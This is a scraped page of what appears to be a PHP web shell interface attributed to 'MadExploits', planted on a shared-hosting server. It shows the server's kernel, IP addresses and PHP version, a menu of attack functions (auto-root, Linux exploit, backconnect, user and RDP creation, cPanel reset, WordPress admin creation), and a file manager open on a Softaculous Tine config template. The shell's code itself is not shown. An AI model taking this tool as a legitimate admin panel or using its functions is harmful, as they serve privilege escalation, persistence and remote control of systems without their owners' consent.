Linux premium155.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
LiteSpeed
: 162.0.235.200 | : 3.144.253.195
Cant Read [ /etc/named.conf ]
7.4.33
varifktc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
tine /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
clone.php
4.09
KB
-rw-r--r--
config.inc.php
1.37
KB
-rw-r--r--
edit.php
4.38
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
fileindex.php
332
B
-rw-r--r--
import.php
3.33
KB
-rw-r--r--
info.xml
3.22
KB
-rw-r--r--
install.js
921
B
-rw-r--r--
install.php
6.26
KB
-rw-r--r--
install.xml
820
B
-rw-r--r--
md5
2.66
KB
-rw-r--r--
notes.txt
1.42
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : config.inc.php
<?php // NOTE: You can either: // - copy this file to config.inc.php and add change config values // - create an empty config.inc.php, make it writeable to the webserver and edit config via the setup.php interface // - make this directory temporary writeable to the webserver and edit config via the setup.php interface // minimal configuration return array( // set 'count' equal zero to disable captcha, or set to number of invalid logins before request captcha. 'captcha' => array('count'=>0), 'database' => array( 'host' => '[[softdbhost]]', 'dbname' => '[[softdb]]', 'username' => '[[softdbuser]]', 'password' => '[[softdbpass]]', 'adapter' => 'pdo_mysql', 'tableprefix' => '[[dbprefix]]', ), 'setupuser' => array( 'username' => '[[admin_username]]', 'password' => '[[admin_setup_pass]]' ), 'tmpdir' => '[[softdatadir]]/tmp', 'filesdir' => '[[softdatadir]]/files', /* // optional cache (recommended) 'caching' => array ( 'active' => true, 'path' => 'PATH TO CACHE (NEEDS TO BE WRITEABLE BY WEBSERVER)', 'lifetime' => 3600, ), */ /* // optional logger 'logger' => array ( 'active' => true, 'filename' => 'LOG FILE (NEEDS TO BE WRITEABLE BY WEBSERVER)', 'priority' => '7', ), */ );
Close